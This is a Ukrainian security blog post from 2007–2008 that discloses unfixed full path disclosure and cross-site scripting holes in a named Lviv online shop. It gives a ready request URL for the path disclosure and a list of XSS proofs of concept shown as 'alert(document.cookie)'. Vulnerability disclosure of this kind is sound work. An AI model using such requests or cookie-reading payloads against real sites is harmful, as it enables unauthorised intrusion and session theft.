Websecurity - Веб безпека

04.08.2007

У лютому, 08.02.2007, я знайшов Full path disclosure та Cross-Site Scripting уразливості на проекті www.complex.lviv.ua (інтернет-магазин). Про що найближчим часом сповіщу адміністрацію проекту. Котрий розробили ті ж люди, що і auction.ua, про уразливість в якому я вже писав.

Детальна інформація про уразливості з’явиться пізніше.

04.01.2008

Full path disclosure:

http://www.complex.lviv.ua/comp/index.php?check1=pr&form_pidp=&name_pidpr=&index=&city=&adress=&surname=&name=&fathername=&kod=&phone=&mail=&rahunok=test

XSS:

• alert(document.cookie)
• alert(document.cookie)
• alert(document.cookie)
• alert(document.cookie)
• alert(document.cookie)
• alert(document.cookie)
• alert(document.cookie)
• alert(document.cookie)
• alert(document.cookie)
• alert(document.cookie)
• alert(document.cookie)
• alert(document.cookie)
• цікавий
• html включення

Дані уразливості досі не виправлені. Що є звичайною ситуацією для даних розробників (халатне відношення до безпеки вони демонструють і на auction.ua).

This entry was posted on 20:25 04.01.2008 and is filed under Уразливості. You can follow any responses to this entry through the RSS 2.0 feed.